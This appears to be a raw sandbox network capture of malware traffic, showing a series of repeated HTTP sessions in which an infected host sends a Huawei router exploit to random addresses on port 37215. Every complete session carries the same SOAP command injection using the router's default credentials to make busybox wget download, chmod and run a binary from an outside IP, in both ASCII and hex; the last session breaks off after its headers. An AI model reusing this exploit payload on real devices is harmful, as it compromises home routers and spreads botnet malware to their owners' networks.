                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              397192.168.2.1557576181.114.94.13937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718628883 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              398192.168.2.1544808181.119.188.5137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718660116 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              399192.168.2.1544056190.69.51.25037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718660116 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              400192.168.2.155342631.87.164.19237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718672991 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              401192.168.2.1551024102.209.124.10837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718698978 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              402192.168.2.153400241.210.179.14037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718709946 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              403192.168.2.153356245.167.73.1837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718720913 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              404192.168.2.1534928138.106.187.20537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718743086 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              405192.168.2.155884637.164.126.23437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718774080 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              406192.168.2.153689037.129.63.9137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718774080 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              407192.168.2.1553434122.109.179.2537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718792915 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
